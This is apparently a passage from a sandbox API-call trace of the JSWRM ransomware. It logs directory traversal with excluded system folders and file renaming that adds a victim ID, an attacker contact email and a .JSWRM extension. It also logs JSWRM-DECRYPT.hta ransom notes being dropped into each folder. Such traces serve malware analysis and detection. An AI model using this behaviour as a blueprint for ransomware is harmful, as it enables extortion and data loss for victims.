dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.973] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.973] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.974] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.974] CloseHandle (hObject=0xffffffff) returned 1 [0063.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0063.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0063.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0063.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0063.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0063.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0063.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0063.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.975] MoveFileW (lpExistingFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0063.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.975] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cc9eb3d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cc9eb3d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cc9eb3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0063.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0063.976] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0063.976] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0063.976] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0063.976] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0063.976] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0063.976] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0063.976] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0063.976] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0063.976] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.976] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0063.976] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0063.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0063.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0063.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.976] CreateFileW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.977] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0063.977] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.977] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.977] CloseHandle (hObject=0xffffffff) returned 1 [0063.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0063.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0063.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0063.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0063.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0063.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0063.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0063.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.978] MoveFileW (lpExistingFileName="C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\it-IT\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0063.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.978] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0063.978] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0063.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.978] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0063.978] lstrcmpiW (lpString1="ja-JP", lpString2=".") returned 1 [0063.978] lstrcmpiW (lpString1="ja-JP", lpString2="..") returned 1 [0063.978] lstrcmpiW (lpString1="ja-JP", lpString2="...") returned 1 [0063.978] lstrcmpiW (lpString1="ja-JP", lpString2="windows") returned -1 [0063.978] lstrcmpiW (lpString1="ja-JP", lpString2="recovery") returned -1 [0063.978] lstrcmpiW (lpString1="ja-JP", lpString2="perflogs") returned -1 [0063.978] lstrcmpiW (lpString1="ja-JP", lpString2="documents and settings") returned 1 [0063.978] lstrcmpiW (lpString1="ja-JP", lpString2="$RECYCLE.BIN") returned 1 [0063.978] lstrcmpiW (lpString1="ja-JP", lpString2="system volume information") returned -1 [0063.978] lstrcmpiW (lpString1="ja-JP", lpString2="msocache") returned -1 [0063.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0063.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373a8 [0063.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.979] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\ja-jp\\jswrm-decrypt.hta")) returned 0xffffffff [0063.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373a8 | out: hHeap=0x1e0000) returned 1 [0063.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0063.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0063.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2370d8 [0063.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.979] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\ja-jp\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.979] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.979] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.980] CloseHandle (hObject=0x450) returned 1 [0063.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2370d8 | out: hHeap=0x1e0000) returned 1 [0063.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0063.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0063.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373a8 [0063.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.982] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\ja-jp\\jswrm-decrypt.hta")) returned 0x20 [0063.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373a8 | out: hHeap=0x1e0000) returned 1 [0063.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0063.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.982] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1ccc18cc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231e40 [0063.982] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.982] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1ccc18cc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.982] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.982] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.982] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48c6596, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.982] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.982] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.982] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.982] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.983] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.983] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.983] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.983] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.983] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.983] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.983] HeapFree (in: 